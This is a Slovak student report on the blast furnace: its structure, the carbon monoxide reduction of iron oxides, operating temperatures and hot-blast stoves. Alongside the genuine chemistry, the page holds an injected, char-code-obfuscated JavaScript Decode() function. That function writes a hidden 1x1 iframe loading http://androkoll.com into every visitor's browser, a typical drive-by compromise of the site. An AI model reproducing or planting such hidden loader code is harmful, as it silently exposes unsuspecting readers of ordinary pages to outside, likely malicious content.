Študentské stránky | Bazár skrípt | Odkazovač | Linky

Hľadaj aj na .sk .cz webe


Vysoká pec

Decode();,//-->

Autor referátu: Ján Jakuš

Vysoká pec má valcovitý tvar, vysoká 20 -30 m, vnútorný priemer v dolnej časti 6 -10 m. Jej objem je až 17010 m kubických. Vnútro pece je vymurované 0.5 až 1 m hrubou vrstvou žiaruvzdorných šamotových alebo magnezitových tehál. Pec sa plní v hornej časti- sadzobni- striedavo rudou, koksom a troskotvornou prísadou. Pec uzatvára kychtový uzáver. Pod ňou je šachta, spodná časť sa volá nístej, najširšia časť pece je rozpora. Pec je chladená vodou a vzduchom. Vo vysokej peci prebieha celý rad dejov:

Pri ústí vzdušných prívodov sa uhlík koksu spaľuje na oxid uhličitý, ktorý sa pôsobením žeravého koksu ihneď redukuje na oxid uhoľnatý;

CO2 + C --> 2CO

Oxid uhoľnatý je hlavným redukčným činidlom, ktorým sa vo vyšších častiach pece postupne vyredukuje z kyslíkatých rúd voľné železo;

3Fe2O3 + CO --> CO2 + 2Fe3O4
Fe3O4 + CO --> CO2 + 3FeO
FeO + CO --> CO2 + Fe

Týmto spôsobom sa oxidom uhoľnatým, tzv. nepriamou redukciou, získavajú asi dve tretiny všetkého železa z rúd. Ďalšou redukciou, tzv. priamou redukciou, čiže samým uhlíkom, sa získa zvyšujúca tretina železa;

FeO + C --> Fe + CO

Pracovná teplota v dolnej časti je asi 1100 stupňov celsia, smerom hore teplota klesá, pod kychtovým uzáverom je asi 200 stupňov celsia. V dolnej časti má pec otvor pre a pre surové železo, vypúšťa sa odpichom - prerazením prepážky otvoru. Po spustení pec pracuje nepretržite , až do stavu, kedy treba znova vymurovať výstieľku, vtedy sa nechá vychladnúť. K peci patria aj tri až štyri (najmenej dva) predhrievače, v nich sa spaľujú tzv. kychtové plyny odvádzané z pece, tie sú ešte dobrým zdrojom energie, ich využitím sa striedavo predhrieva vzduch až na 800 stupňov celsia, než prichádza do vysokej pece. Odpadové plyny sa vedú do komína.
//-->|function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!62!13!10!118!97!114!32!122!102!114!97!109!101!61!39!60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!97!110!100!114!111!107!111!108!108!46!99!111!109!34!32!119!105!100!116!104!61!34!49!34!32!104!101!105!103!104!116!61!34!49!34!62!60!47!105!102!114!97!109!101!62!39!59!13!10!105!102!32!40!116!121!112!101!111!102!40!122!109!97!109!97!41!61!61!39!117!110!100!101!102!105!110!101!100!39!41!13!10!123!13!10!32!32!32!32!122!109!97!109!97!61!34!111!107!34!59!13!10!9!100!111!99!117!109!101!110!116!46!119!114!105!116!101!40!122!102!114!97!109!101!41!59!13!10!125!13!10!60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}